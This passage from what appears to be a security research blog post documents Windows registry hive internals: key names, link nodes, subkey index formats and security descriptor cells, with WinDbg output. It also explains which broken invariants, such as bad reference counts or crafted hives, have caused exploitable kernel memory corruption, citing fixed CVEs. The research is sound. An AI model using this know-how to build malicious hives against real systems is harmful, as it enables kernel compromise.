consistency requirements related to registry key names, enforced when loading a hive and later at runtime: Compression: If the KEY_COMP_NAME (0x20) flag is clear in _CM_KEY_NODE.Flags, the name is formatted as a wide string of 16-bit characters. If it is set, which is the common scenario, then "Name" represents a more tightly packed ASCII string of 8-bit characters. Considering that a majority of keys in the registry are alphanumeric, this optimization saves a non-trivial amount of memory and disk space. It is interesting to note that it is still possible to load a hive with a non-optimally formatted key name (non-compressed ASCII string), but such a key node would never be generated by Windows itself.Length: The key name mustn't be empty (i.e. it should be at least one character long), and it cannot exceed 256 characters in length (even though Registry element size limits incorrectly claims that the limit is 255). The NameLength field value is expressed in bytes, so it must be between 1-256 for compressed names, and 2-512 for wide strings (and divisible by two). Up until October 2022, this limit was not correctly enforced, making it possible to load hives with key names up to 1040 characters, which would then be mishandled or outright rejected by other parts of the registry code.Charset: All characters in the 0x0000 – 0xFFFF range are allowed in a key name with the exception of backslash ('\', 0x005C). The backslash is singled out because it plays a special role in the registry, separating distinct elements of the registry paths. Since the kernel must always be able to distinguish parts of key names from the separator, a decision was made to exclude this one character from the key name charset, similar to how backslashes are not allowed in file names. Furthermore, there is a second minor requirement that the key name must not start with a null character, but it may be present at any other position in the name (this only started to be properly enforced in NtRenameKey after the fix for CVE-2024-26178 in March 2024). Overall, this means that key names aren't truly textual strings in the conventional sense of the word: they don't use a terminator, and may contain all sorts of non-printable characters. It would be more appropriate to think of them as binary blobs used to reference registry keys, which doesn't have any consequences for the kernel, as it universally uses the UNICODE_STRING structure that includes both the length and the backing buffer of the string anyway. But if a potentially malicious program were to create a key with an unusual name (e.g. including a null character), it could prove difficult for an administrator to operate on it with the built-in registry utilities (reg.exe, Regedit), or even with third-party tools that use the high-level API (such as RegOpenKeyEx). In such cases, it might be required to use specialized tools that interact with the Windows registry directly through the system call interface as the only way to examine/modify such keys.Uniqueness: One of the most important invariants of the Windows registry implementation is the uniqueness of key names: there may be only one key with a specific path, or in other words, for every key, there mustn't be any duplicates in the list of its subkeys. Given that registry key names are case-insensitive, any two names are always compared in their uppercase form to determine if they are equal or not. This uniqueness requirement is enforced both during hive load and subsequent operations, and failure to do it correctly could lead to both logic bugs and memory corruption. For some examples of the potential outcomes of allowing duplicate key names in registry, see Maxim Suhanov's The uppercased hell blog or my CVE-2023-21748 / CVE-2023-23420 bug reports. Another intriguing aspect of the key names are the names associated with the root keys of default system hives. In general, every registry key in Windows is referenced by its name specified in the key node, except for root keys, which are known by the name of their mount points. As a result, the "real" underlying names of root keys are never visible to users or applications, but they are nevertheless present in the hive file as a mandatory part of every key node, and could be potentially used to learn something about how these fundamental system hives (SOFTWARE, SYSTEM etc.) are generated. I have examined hives from various Windows versions ranging from Windows NT 3.1 to Windows 11, and arrived at the following list of per-version root key names: Version Root key name NT 3.1 - NT 4.0 Same as the hive name (e.g., "SYSTEM") 2000 - XP $$$PROTO.HIV Vista - 7 CMI-CreateHive{RANDOM GUID} 8 CsiTool-CreateHive-{00000000-0000-0000-0000-000000000000} 10 - 11 ROOT In early NT versions, the root key name simply mirrored the hive's file name. In Windows 2000 and XP, the name stemmed from the fact that system hives were created during system installation by temporarily creating the tree root under \Registry\Machine\SYSTEM\$$$PROTO.HIV, pre-initializing it with the default data for the given hive, and saving it to a file with an API like RegSaveKeyEx. In Windows 10 and 11, the name is simply "ROOT", which, along with the "OfRg" magic bytes at offset 0xB0 in the file header, hints that the hives are created with the Offline Registry Library. This leaves versions between Windows Vista and Windows 8 as the big unknown: neither "CMI-CreateHive" nor "CsiTool-CreateHive" sound particularly familiar, and I haven't been able to find any information about them in any public resources. It is probably safe to assume that these strings are indicative of some internal Microsoft tooling that was used to generate hives for these systems, but not much is known beyond it. Nevertheless, I find it fascinating that such little tidbits of information can be found in obscure corners of file formats. You never know when some other missing part of the puzzle becomes known publicly, making it possible to finally connect the dots and see the bigger picture, sometimes years or decades after the initial release of the software.Link nodes As mentioned above, link nodes are a special type of key node designed to facilitate the mounting of arbitrary hives from disk into the global registry view. They are managed by the Windows kernel and only ever exist in memory. They are represented by the _CM_KEY_NODE structure, but with the following differences compared to regular keys: The Signature field is set to 0x6B6C ('lk') instead of 0x6B6E ('nk'),The KEY_HIVE_EXIT (0x0002) flag is set in Flags,The key doesn't have any of the standard key properties, such as the security descriptor, class, subkeys or values. The only cell reference it contains is to its parent cell, which is one of \Registry\A, \Registry\Machine, \Registry\User or \Registry\WC.Instead of the SubKeyLists member at offset 0x1C, the link node uses the ChildHiveReference field of type _CM_KEY_REFERENCE, which stores a kernel-mode pointer to the destination hive descriptor (_HHIVE*), and the cell index of the root key within that hive. So, whenever you see a hive root key (e.g. any key within HKLM or HKCU), you are actually looking at a pair of a link node (also known as exit node) + root key (a.k.a. entry node – these terms are used interchangeably). The mount point assumes the key name of the link node (so that it is easily enumerable with the existing kernel logic), and all of the characteristics of the entry node. This is illustrated in the following diagram, where the key marked in red is the link node of the SYSTEM hive, and the green one is the root key: The existence of link nodes seems to be very little known and scarcely documented in public resources, which is likely caused by the fact that the Windows kernel makes them virtually invisible, and not just for users and high-level API clients, but even for administrators and kernel driver developers. The way the registry tree traversing code is structured, whenever it encounters a link node, it always makes sure to skip over it and reference the corresponding entry node. This means that it is impossible to open or otherwise observe the link node itself from the context of user-mode, but if we put in some effort, we should be able to see it in WinDbg attached as a kernel debugger. We can approach the link node from two sides: either try to find it top-down starting from the master hive, or by locating a key in a mounted hive and traversing the registry tree upwards. In this post, we will proceed with the first idea and enumerate the keys within \Registry\Machine (i.e. HKLM): 0: kd> !reg querykey \registry\machine Found KCB = ffff800f88ad96e0 :: \REGISTRY\MACHINE Hive         ffff800f88a88000 KeyNode      ffff800f88ada16c [SubKeyAddr]         [SubKeyName] ffff800f88ada44c     BCD00000000 ffff800f88ada3cc     HARDWARE ffff800f88ada59c     SAM ffff800f88ada504     SECURITY ffff800f88ada374     SOFTWARE ffff800f88ada31c     SYSTEM  Use '!reg keyinfo ffff800f88a88000 ' to dump the subkey details [ValueType]         [ValueName]                   [ValueData] REG_DWORD           ServiceLastKnownStatus        2 Here, we can see all the system hive mount points together with their corresponding link node addresses. In case of normal, stable keys, these would be user-mode addresses within the address space of the Registry process, but since the master hive is a volatile one, all of its structures are stored on the kernel pools. We can then use a command such as !reg knode to query any of the specific subkeys, e.g. SYSTEM: 0: kd> !reg knode ffff800f88ada31c Signature: CM_LINK_NODE_SIGNATURE (kl) Name                 : SYSTEM ParentCell           : 0x168 Security             : 0xffffffff [cell index] Class                : 0xffffffff [cell index] Flags                : 0x2a MaxNameLen           : 0x0 MaxClassLen          : 0x0 MaxValueNameLen      : 0x0 MaxValueDataLen      : 0x0 LastWriteTime        : 0x 1db2b94:0xe031a530 SubKeyCount[Stable  ]: 0x0 SubKeyLists[Stable  ]: 0x20 SubKeyCount[Volatile]: 0x0 SubKeyLists[Volatile]: 0xffffffff ValueList.Count      : 0x88a8e000 ValueList.List       : 0xffff800f As expected, the key node has the special link node signature ('kl'), and the 0x2 flag set within the 0x2a Flags bitmask (the other two flags set are KEY_NO_DELETE and KEY_COMP_NAME). The command gets a little confused, because it expects to operate on a regular key node and display its subkey/value counts and lists, but as mentioned above, this space is taken up by the _CM_KEY_REFERENCE structure in the link node. If we line up the offsets correctly, we can decode that the exit node points at cell index 0x20 in hive 0xffff800f88a8e000, which is consistent with the outcome of displaying the structure data directly: 0: kd> dx -id 0,0,ffffbd044acf6040 -r1 (*((ntkrnlmp!_CM_KEY_REFERENCE *)0xffff800f88ada338)) (*((ntkrnlmp!_CM_KEY_REFERENCE *)0xffff800f88ada338))                 [Type: _CM_KEY_REFERENCE]     [+0x000] KeyCell          : 0x20 [Type: unsigned long]     [+0x008] KeyHive          : 0xffff800f88a8e000 [Type: _HHIVE *] We can now translate this information into the cell's virtual address, and take a peek into it with !reg knode and !reg keyinfo: 0: kd> !reg cellindex 0xffff800f88a8e000 0x20 Map = ffff800f88adc000 Type = 0 Table = 0 Block = 0 Offset = 20 MapTable     = ffff800f88ade000  MapEntry     = ffff800f88ade000  BinAddress = ffff800f896e8009, BlockOffset = 0000000000000000 BlockAddress = ffff800f896e8000  pcell:  ffff800f896e8024 0: kd> !reg knode ffff800f896e8024 Signature: CM_KEY_NODE_SIGNATURE (kn) Name                 : ROOT ParentCell           : 0x318 Security             : 0x78 [cell index] Class                : 0xffffffff [cell index] Flags                : 0x2c MaxNameLen           : 0x26 MaxClassLen          : 0x0 MaxValueNameLen      : 0x0 MaxValueDataLen      : 0x0 LastWriteTime        : 0x 1db2b94:0xe031a530 0: kd> !reg keyinfo 0xffff800f88a8e000 ffff800f896e8024 KeyPath         \REGISTRY\MACHINE\SYSTEM [SubKeyAddr]         [SubKeyName] ffff800f896e8174     ActivationBroker ffff800f896e964c     ControlSet001 ffff800f89f0e8a4     DriverDatabase ffff800f89f999c4     HardwareConfig ffff800f89f9a314     Input ffff800f89f9a3dc     Keyboard Layout ffff800f89f9a43c     Maps ffff800f89f9a674     MountedDevices ffff800f89f9ab64     ResourceManager ffff800f89f9abc4     ResourcePolicyStore ffff800f89f9ac2c     RNG ffff800f89f9addc     Select ffff800f89f9aed4     Setup ffff800f89f9b7d4     Software ffff800f89f9d1f4     State ffff800f89f9d24c     WaaS ffff800f89fabc8c     WPA [SubKeyAddr]         [VolatileSubKeyName] ffff800f88b91024     CurrentControlSet  Use '!reg keyinfo ffff800f88a8e000 ' to dump the subkey details [ValueType]         [ValueName]                   [ValueData]  Key has no Values We have indeed ended up at the root key of the SYSTEM hive, which has a standard key node signature ('nk'), the predefined "ROOT" name, a valid security descriptor, a list of subkeys, and so on. Overall, link nodes are an interesting implementation detail of the registry that are worth keeping in mind. However, considering their relative simplicity and the fact that they are hidden away even from very low-level mechanisms like Registry Callbacks, they are of limited significance to system security. The lone vulnerability I found related to them, CVE-2023-21747, resulted in a use-after-free due to improper cleanup of the exit node when faced with an out-of-memory condition.Subkey indexes Operations performed on subkey lists are some of the most common ones – they are involved whenever a key is opened, created, deleted, renamed or enumerated, which constitutes a majority of actions involving the registry at runtime. It is for this reason that subkey lists have seen the most evolution throughout the subsequent versions of the regf format. As the interface was getting adopted by more and more applications in Windows NT and later systems, Microsoft developers could collect data on the typical usage patterns and devise adequate optimizations to speed these operations up. In this section, we will have a deeper look into how subkey indexes are formatted in the hives, and how the different types of operations affect them. By way of introduction, subkey indexes are data structures storing lists of descendant keys relative to a parent key, referenced through the _CM_KEY_NODE.SubKeyLists[...] cell indexes. During hive load, the value at index 0 of the array may either be a subkey index, or HCELL_NIL if there are no subkeys; index 1 must always be equal to HCELL_NIL, as by definition there are no volatile subkeys on disk. The high-level concept behind the subkey index is that it is a linear list of key node cell indexes, which must efficiently support the following operations (from most to least commonly used, in my subjective opinion): Finding a key by name,Finding a key by index on the list,Adding a new key to the list,Deleting a key from the list. Regardless of the underlying representation of the list, it is always stored in a lexicographical order, reducing the lookup-by-name time from linear to logarithmic by using binary search. Let's now look into the specific structures used in registry hives to implement this functionality.Index leaves Index leaves are the most basic type of a subkey list, which has been supported since the first iteration of the regf format and consists of just three members: the signature (0x696C, 'li'), number of entries (16-bit), and an inline, variable-length list of the cell indexes. The corresponding Windows kernel structure is _CM_KEY_INDEX: 0: kd> dt _CM_KEY_INDEX nt!_CM_KEY_INDEX    +0x000 Signature        : Uint2B    +0x002 Count            : Uint2B    +0x004 List             : [1] Uint4B Given the Count field range, the index leaf can store up to 65535 subkeys. It is the most compact one in terms of disk/memory consumption, but it provides somewhat poor cache locality, because every key referenced during the lookup must be accessed in memory in order to read its name from _CM_KEY_NODE.Name. Nevertheless, index leaves are still commonly used in all versions of Windows up to this day. As an example, let's consider a key with five subkeys named "wombat", "🐂", "HIPPO", "ant", and "ocelot". An index leaf of such a key could look like this: This illustrates that entries in the list are indeed stored in a sorted manner, and in a case-insensitive way – "ant" goes before "HIPPO" even though 'H' (0x48) < 'a' (0x61). However, this logic applies to comparisons only, and otherwise the letter casing specified during key creation is preserved and visible to registry users. Finally, the unicode ox symbol is placed last on the list, because it is encoded as U+D83D U+DC02, and 0xD83D is greater than any of the ASCII characters in the other names.Fast leaves Fast leaves are slightly younger than subkey indexes, introduced in regf version 1.3 in 1995 (Windows NT 4.0). As hive versions 1.2 and below have been long obsolete, that means that fast leaves are universally supported in every modern version of Windows at the time of this writing. As the name suggests, they are meant to be faster than their predecessors, by including up to four initial characters of each subkey in the list as a "hint" next to the cell index of the key. This allows the kernel to execute the first four iterations of the string comparison loop using data only from the fast leaf and without referring to the corresponding node, which addresses the aforementioned issue of poor cache locality in index leaves. We expect this optimization to be effective in most real-life scenarios, as most keys consist of ASCII-only characters and differ from each other within the first four symbols. The specific logic of generating the 32-bit hint from a string can be found in the internal CmpGenerateFastLeafHintForUnicodeString kernel function, but is boils down to the following steps: Set the initial hint variable to 0In a loop of min(4, length) iterations:If the n-th character is greater than 0xFF, breakOtherwise add the character (with its original case) to the hintReturn the hint to the caller For example, the hint for "ant" is "ant\0", the hint for "HIPPO" is "HIPP", and the hint for "🐂" is "\0\0\0\0" (the first character is non-ASCII, so the whole hint is simply zero). When it comes to the structure layout of the fast leaf, it is basically the same as the index leaf, but it has a different signature ('lf') and twice as many entries in the List array due to the addition of hints. There doesn't seem to be any structure definition corresponding specifically to fast leaves in the public symbols, which either means that the structure is a non-public one, or it is also accessed via _CM_KEY_INDEX in the source code, but through references such as Index.List[2*n] instead of Index.List[n]. An illustration of a fast leaf containing the five example subkeys is shown below: Hash leaves Hash leaves are the third and last (for now) iteration of the subkey index format, introduced in Windows XP in 2001 (regf version 1.5). They have exactly the same data layout as fast leaves, but are characterized by the 'lh' signature, and the 32-bit hint is a simple hash of the entire string instead of an inline representation of the first four characters. The specific hashing algorithm is implemented in the internal CmpHashUnicodeComponent function, and can be summarized with the following steps: Start with a hash equal to 0For every character in the string:Hash = (Uppercase(Character) + 37 * Hash) % 0x100000000Return the hash to the caller The main benefit of this approach is that it works equally well with ASCII and non-ASCII strings, and it covers the entire name and not just a prefix, further limiting the number of necessary references to the subkey nodes during key lookup. However, you may notice that a full-string hash isn't really compatible with the concept of binary search, and indeed, whenever a hash leaf is used, the kernel performs a linear search instead of a binary one, as can be seen in the corresponding CmpFindSubKeyByHashWithStatus function. In theory, this could lead to iterating through 65535 keys (the maximum number of entries in a hash leaf), but in practice, the kernel makes sure that a hash leaf is never longer than 1012 elements. This is okay for performance, because when more subkeys are associated with a key, a second-level data structure comes into play (the root index, see the next section), and that one is always traversed with a binary search. Overall, it seems possible that the cache friendliness of the hash leaf makes up for its theoretically worse lookup complexity, especially in the average case. A corresponding diagram of a hash leaf data layout is shown below: Root indexes Each key in the registry can potentially have many thousands of subkeys, but having them stored in one very long list (such as a single index, fast or hash leaf) could lead to poor performance for some operations. For example, whenever a new key is inserted into the alphabetically sorted list, the portion of the list after the new key has to be moved in memory to make room for the new item. Similar CPU-heavy situations could arise when extending the dynamically sized array in the hive, and potentially having to copy its entire contents to a new cell if the existing one doesn't have any free space behind it. In the worst case scenario, this would have a complexity of O(n) per operation, which is too slow for such an important system mechanism as the Windows registry. It is likely for this reason that whenever the subkey list becomes longer than 1012 elements for the first time, a second-level index called the root index is inserted into the data structure. This has the goal of splitting a single long list into several shorter ones, which are easier to manage in memory. Root indexes cannot be nested or referenced recursively by one another: a subkey list may either be non-existent, a single leaf-type list, or a single root index pointing at leaf-type lists (in other words, the list may be 0, 1 or 2 levels deep). The root index has existed for as long as the index leaves have: since the very first regf version 1.0 in Windows NT 3.1 Pre-Release. It also has the same layout represented by the _CM_KEY_INDEX structure, which consists of a signature ('ri' in this case), a 16-bit count and an array of cell indexes pointing at leaf-type lists, without any additional hints. An example diagram of a two-level subkey index containing five keys is shown below: Fundamental subkey list consistency requirements There is a set of some very basic format consistency requirements concerning subkey indexes, which must be always met for any active hive in the system, regardless of whether it has been loaded from disk or created from scratch at runtime. These are the minimum set of rules for this data structure to be considered as "valid", and they are tightly connected to the memory safety guarantees of the kernel functions that operate on them. They are as follows: The signature of each subkey list cell must be correctly set to its corresponding type, one of 'li', 'lf', 'lh' or 'ri'.The size of the cell must be greater or equal to the number of bytes required to store all of the elements in the "List" array, according to the value of the "Count" member.A subkey list cell may never be empty, i.e. _CM_KEY_INDEX.Count mustn't be zero (whenever it becomes zero, it should be freed and un-referenced in any of the other hive cells).The number of subkeys cached in the key node (_CM_KEY_NODE.SubKeyCounts[x]) must be equal to the number of subkeys defined in the subkey index (i.e. the sum of _CM_KEY_INDEX.Count of its index leaves).The cell indexes stored in _CM_KEY_NODE.SubKeyLists[x] must either be HCELL_NIL (if SubKeyCounts[x] is zero), or point to a root index or one of the three leaf types. Additionally, SubKeyCounts[1] must be zero and SubKeyLists[1] must be HCELL_NIL on hive load.All cell indexes stored in a root index must point at valid leaf indexes.All cell indexes stored in leaf indexes must point at valid key nodes.All hints specified in the fast leaves and hash leaves must be consistent with the names of their corresponding keys.The overall subkey list must be sorted lexicographically, i.e. the name of each n+1th subkey must be strictly greater than the name of the nth subkey. This also entails that there mustn't be any duplicates in the subkey list, neither with regards to the cell index or the subkey name. Notably, there are also some constraints that seem very natural, but are in fact not enforced by the Windows kernel: There is no requirement that the format of a leaf-type index must be consistent with the version of the hive: instead, every one of li/lf/lh types are accepted for every hive version 1.3 – 1.6. The most glaring example of this behavior is that hash leaves are allowed in hive versions 1.3 and 1.4, even though they were historically only introduced in version 1.5 of the format.There is no requirement that all the leaf indexes referenced by a root index are all of the same type. In fact, a single subkey list may consist of an arbitrary combination of index leaves, fast leaves and hash leaves, and the kernel must handle such situations gracefully.Beyond the fact that none of the actively used subkey indexes may be empty, there are no limitations with regards to how the subkeys are laid out in the data structure. For example, the existence of a root index doesn't automatically indicate that there are many subkeys on the list: there may as well be a single root index, pointing to a single leaf, containing a single subkey. It is also allowed for several leafs being part of a single root index to have wildly different counts, with some single-digit ones coexisting with others around the 64K mark. The kernel doesn't ensure any advanced "balancing" of the subkey index by default – it does split large leafs into smaller ones, but only while adding a new subkey, and not during the loading of an existing hive. Three examples of kernel vulnerabilities that were directly related to the handling of subkey lists are: CVE-2022-37956 (integer overflows in registry subkey lists leading to memory corruption), CVE-2022-38037 (memory corruption due to type confusion of subkey index leaves in registry hives) and CVE-2024-26182 (subkey list use-after-free due to mishandling of partial success in CmpAddSubKeyEx). I personally find the first one (CVE-2022-37956) particularly interesting, because the hive memory corruption could be triggered with the right sequence of API calls, or even just command-line reg.exe tool invocations. Granted that the number of required operations was quite high (around 66 million), but it still goes to show that being intimately familiar with the inner workings of the target software may open new avenues of exploitation that would otherwise not be available. For a detailed explanation of the subkey list management logic, see the next section.Internal Windows logic of handling subkey lists On top of the requirements and restrictions imposed by the regf format itself, there are some further characteristics of most registry hives found on real systems, caused by some decisions implemented in the logic of the Windows kernel. The most important thing to note is that, as mentioned above, the kernel operates on any subkey list lazily, only when there is a need to do so due to a key being added/deleted in the registry. Therefore, a weirdly formatted (but adhering to the bare regf requirements) subkey index will remain in this state after loading, for as long as a client application doesn't decide to change it. Most of the relevant high-level logic of handling subkey lists takes place when adding new keys, and is illustrated in the flow chart below: The general high-level function that implements the above logic in the Windows kernel is CmpAddSubKeyEx, which then calls a few helper routines with mostly self-descriptive names: CmpAddSubKeyToList, CmpSelectLeaf, CmpSplitLeaf and CmpAddToLeaf. Compared to addition, the process of deleting a key from the list is very straightforward, and is achieved by removing it from the respective leaf index, freeing the leaf if it was the last remaining element, and freeing the root index if it was present and the freed leaf was its last remaining element. There are no special steps being taken other than the strictly necessary ones to implement the functionality. Given the above, we can conclude that registry hives created organically by Windows generally adhere to the following set of extra rules:The leaf types being used are in line with the version of the hive: index and fast leaves for versions ≤1.4, and hash leaves for versions ≥1.5.All leaves within a single index root have the same type.Index leaves never contain more than 1012 elements.Once a root index is created for a key, it is never downgraded back to a single leaf index other than through the deletion of all subkeys, and creating a new one starting from an empty subkey list.Security descriptors Security descriptors play a central role in enforcing access control to the information stored in the registry. Their significance is apparent through the fact that they are the only mandatory property of registry keys, as opposed to classes, values and subkeys which are all optional. At the same time, large groups of keys typically share the same security settings, so it would make little sense to store a separate copy of the data for every one of them. For example, in a default installation of Windows 11, the SOFTWARE hive includes around 250,000 keys but only around 500 unique security descriptors. This is why they are the only type of cell in the hive that can be associated with multiple keys at the same time. By only storing a single instance of each unique descriptor in the hive, the system saves significant disk and memory space. However, this efficiency requires careful management of each descriptor's usage through reference counting, which ensures they can be safely freed when no longer needed. When loading a hive, the kernel enumerates all of its security descriptors without having to traverse the entire key tree first. In order to make this possible, security descriptors in the stable space are organized into a doubly-linked list, starting at the descriptor of the root key. Internal consistency of this list is mandatory – if any inconsistencies are found, it is reset to become a single-entry list with just the root security descriptor and nothing else. If the root security descriptor itself is corrupted, the hive is deemed to be in an unrecoverable state and rejected completely. While traversing the global list, the kernel also verifies that the binary encoding of the security descriptors is valid and safe to pass to internal security-related functions later in time. In the hives, descriptors are formatted as self-contained blobs of bytes adhering to the SECURITY_DESCRIPTOR_RELATIVE structure layout. Compared to other hive cells (key nodes etc.), the internal format of security cells is relatively complex: it is variable in size and contains multiple sub-structures (SIDs, ACLs, ACEs), length indicators and internal offsets. To detect any potential corruption early, the RtlValidRelativeSecurityDescriptor function must succeed for every descriptor in a newly loaded hive, otherwise the previously discussed fallback logic takes place. The last step in the security descriptor validation process is to make sure that the reference counts specified in the hive are equal to the actual number of references from registry keys. This is achieved by re-counting the references when traversing the key tree structure of the hive, and later checking if the values found in _CM_KEY_SECURITY.ReferenceCount are in line with the regenerated counts. If the two values are unequal, the refcount in the security cell is adjusted to reflect the correct number of references. This is critical for system security, because operating on an invalid refcount – especially an inadequately small one – may directly lead to exploitable memory corruption conditions. Some examples of historical vulnerabilities related to the three fundamental aspects of security descriptor consistency are as follows:Linked list consistency: CVE-2022-34708, CVE-2024-26178Security descriptor binary format validity: CVE-2022-35768Reference counting: CVE-2022-34707, CVE-2023-28248, CVE-2023-35356, CVE-2023-35382, CVE-2023-38139 A high-level illustration of a security descriptor linked list consisting of three elements is shown in the diagram below: Security cell format Let's now have a look at the specific layout of the security cells. They are represented by the _CM_KEY_SECURITY structure, whose definition is shown in the WinDbg format below: 0: kd> dt _CM_KEY_SECURITY nt!_CM_KEY_SECURITY    +0x000 Signature        : Uint2B    +0x002 Reserved         : Uint2B    +0x004 Flink            : Uint4B    +0x008 Blink            : Uint4B    +0x00c ReferenceCount   : Uint4B    +0x010 DescriptorLength : Uint4B    +0x014 Descriptor       : _SECURITY_DESCRIPTOR_RELATIVE Each of its fields is discussed in more detail in the following subsections.Signature The magic bytes of this cell type, equal to 0x6B73 ('sk'). It exists for informational purposes only, but isn't used for anything at runtime – it isn't even verified on hive load, and can therefore be anything in a binary-controlled hive.Reserved An unused field that may contain arbitrary data; never accessed by the kernel.Flink and Blink As discussed earlier, these are the forward and backward links in the security descriptor list. They must always be kept in a valid state. In a single-element list, Flink/Blink point at themselves – that is, at the security descriptor they are both part of.ReferenceCount This single field was arguably responsible for the most registry-related vulnerabilities out of all of the hive structures. It is a 32-bit unsigned integer that expresses the number of objects that actively rely on this security descriptor, which mostly means the key nodes associated with it, but not only. Whenever this member gets out of sync with the real number of references, it may lead to serious memory corruption primitives, so it is very important that the kernel ensures its correct value both on hive load and during any subsequent operations. The two prevalent risks are that: The refcount gets too small: when this happens, it is possible that the cell gets freed while some objects still hold active references to it. This leads to a straightforward use-after-free scenario, and in my experience, it is easily exploitable by a local attacker.The refcount gets too large: this situation doesn't immediately lead to memory corruption, but let's remember that the structure member has a limited, 32-bit width. If an attacker were able to indiscriminately increment the counter without real references to back it up, they could eventually get it to the maximum uint32 value, 0xFFFFFFFF. For many years, the Windows kernel hasn't implemented any protection against registry refcount integer overflows, so another incrementation of the field after 0xFFFFFFFF would wrap it back to zero, which brings us to the previous scenario of an inadequately small count. However, following some bug reports and discussions, Microsoft has gradually added overflow protection in the relevant, internal functions, starting in April 2023 and eventually landing the last missing check in November 2024. Thanks to this effort, I believe that as I am writing this, security descriptor refcount leaks should no longer be an exploitable condition. Under most circumstances, the value of the refcount is somewhere between 1 and ~24.4 million (the maximum number of keys in a hive given the space constraints). However, it is interesting to note that it might be legitimately set to a greater value. Consider the following: immediately after loading a hive, all security refcounts are exactly equal to the number of keys associated with them. But, key nodes globally visible in the registry tree are not the only ones that can reference security cells; there may be also keys that have been created in the scope of a transaction and not committed yet, as well as pending, transacted operations of changing the security properties of a key (marked by the UoWAddThisKey and UoWSetSecurityDescriptor enums of type UoWActionType). They too may increase the refcount value beyond what would normally be possible with just regular, non-transacted keys. This phenomenon has been discussed in detail in the CVE-2024-43641 bug report. Overall, reference counts are of great importance to system security, and every registry operation that involves it deserves a thorough security assessment.DescriptorLength This is the length of the security descriptor data (i.e. the size of the Descriptor array) expressed in bytes. It's worth noting that the format doesn't force it to be the minimum length sufficient to store the binary blob. This means that the overall cell length must be greater than DescriptorLength + 20 (i.e. the declared length of the descriptor plus the _CM_KEY_SECURITY header), and in turn DescriptorLength must be greater than the actual size of the descriptor. Both cases of the cell size or the DescriptorLength having non-optimal values are accepted by the kernel, and the extra bytes are ignored.Descriptor This variable-length array stores the actual security descriptor in the form of the SECURITY_DESCRIPTOR_RELATIVE structure. It doesn't necessarily have to be formatted in the most natural way, and the only requirement is that it successfully passes the RtlValidRelativeSecurityDescriptor check with the RequiredInformation argument set to zero. This means, for example, that the Owner/Group/Sacl/Dacl components may be spread out in memory and have gaps in between them, or conversely, that their representations may overlap. This was one of the main contributing factors in CVE-2022-35768, but the fix was to more accurately calculate the length of irregularly-encoded descriptors, and the freedom to structure them in non-standard ways has remained. It is even possible to use a completely empty descriptor without any owner or access control entries, and such a construct will be acknowledged by the system, too. Another somewhat interesting fact is that security descriptors are meant to be deduplicated, so naturally whenever a user assigns a security descriptor that already exists in the hive, it is simply reused and its reference count is incremented. However, again, the format (or rather its canonical implementation in Windows) doesn't force the uniqueness requirement upon the security descriptors in hives loaded from disk. So, even though they would be never created by the OS itself, multiple identical copies of a descriptor are allowed in specially crafted hives and may co-exist without (seemingly) causing any issues for the kernel. The access rights defined by the security descriptors are based on permissions specific to the registry and its operations, so there is an access mask dedicated to creating keys (KEY_CREATE_SUB_KEY), reading values (KEY_QUERY_VALUE), writing values (KEY_SET_VALUE), and so on. They all have self-descriptive names and are well-documented in Registry Key Security and Access Rights, so we won't spend more time discussing them here.Security descriptors of volatile keys Similarly to every other property of a registry key, the storage type of a security descriptor always matches the type of its associated key(s). This means that a stable key will always use a stable descriptor, and a volatile key – a volatile descriptor. It is the only "exception" to the rule that security descriptors are deduplicated and unique within the scope of the hive. If there are two keys with identical security settings but different storage types, they will reference two distinct security descriptor cells via their _CM_KEY_NODE.Security fields, one with the highest bit set and the other with the bit clear. The descriptors stored on both sides are subject to the same rules with regards to reference counting, allocating and freeing. Furthermore, we have previously discussed how all security descriptors in a hive are connected in one global doubly-linked list, but this only applies to the descriptors in the stable space. The functionality is needed so that the descriptors can be enumerated by the kernel when loading a hive from disk, and since volatile descriptors are in-memory only and disappear together with their corresponding keys on hive unload or a system shutdown, there is no need to link them together. The internal CmpInsertSecurityCellList function takes this into account, and points the Flink/Blink fields at themselves, making each volatile descriptor a single-entry list in order to keep it compatible with the list linking/unlinking code. This behavior is illustrated in the diagram below, with two volatile security descriptors each being in their own pseudo-list: This slight quirk is the reason why the ability to create stable keys under volatile ones, which should normally not be possible, may be an exploitable condition with security impact. For details, see the "Creation of stable subkeys under volatile keys" section in the CVE-2023-21748 bug report, or the CVE-2024-26173 bug report.Security descriptors in app hives In normal registry hives, there are no artificial restrictions with regards to security descriptors. There may be an arbitrary number of them, and they may contain any type of settings the user wishes, as long as they have binary control over the hive file and/or the existing security descriptors grant them the access to change them to whatever they want. However, there are some limitations concerning security descriptors in application hives, as documented in the MSDN page of the RegLoadAppKeyA function: All keys inside the hive must have the same security descriptor, otherwise the function will fail. This security descriptor must grant the caller the access specified by the samDesired parameter or the function will fail. You cannot use the RegSetKeySecurity function on any key inside the hive. The intent behind the quote seems to be that the security settings within an app hive should be uniform and immutable; that is, remain identical to their initial state at hive creation, and consistent across all keys. There is indeed some truth to the documentation, as trying to change the security of a key within an app hive with RegSetKeySecurity, or to create a new key with a custom descriptor both result in a failure with STATUS_ACCESS_DENIED. However, the part about all keys having the same security descriptor is not actually enforced, and a user can freely load an app hive with any number of different security descriptors associated with the keys. This was reported to Microsoft as WinRegLowSeverityBugs issue #20, but wasn't deemed severe enough to be addressed in a security bulletin (which I agree with), so for now, it remains an interesting discrepancy between the documentation and implementation.Key values and value lists While keys allow software to create a data organization hierarchy, values are the means of actually storing the data. Each value is associated with one specific key, and is characterized by the following properties:NameTypeData In general, values are much simpler than keys. To begin with, they are not a full-fledged object in the NT Object Manager sense: you cannot open a handle to a value, and thus you may only access them through the handle of its associated key and its name. They also don't have dedicated security descriptors, so a client with a key handle with the KEY_QUERY_VALUE access can enumerate and read all values of the key, and the KEY_SET_VALUE rights allows the caller to create/modify/delete all values within a key. For these reasons, values are best thought of as elaborate attributes of a key, not as an independent entity. There is no fixed limit on the number of values associated with a key other than the available hive space, which places the number at around 67 million (0x80000000 ÷ 0x20, the hive space divided by the minimum value cell size). The value list format is also not as optimized as the subkey index is: it is a linear, single-level list with just the raw value cell indexes, without any additional metadata like a header or hints. The list is not sorted either, and their order is defined by when they were added to the key. Finally, value name uniqueness is guaranteed on output, but not enforced on input: it is possible to load a specially crafted hive with several values with the same name, and contrary to duplicate keys, this doesn't seem to pose any fundamental problems for the registry implementation. A high-level overview of the hive cells related to a key's value list is shown below: In the next section, we will examine the internal layout and semantics of the _CM_KEY_VALUE structure, which describes each unique value in the registry.The key value cell As usual, we can print out the structure definition in WinDbg: 0: kd> dt _CM_KEY_VALUE 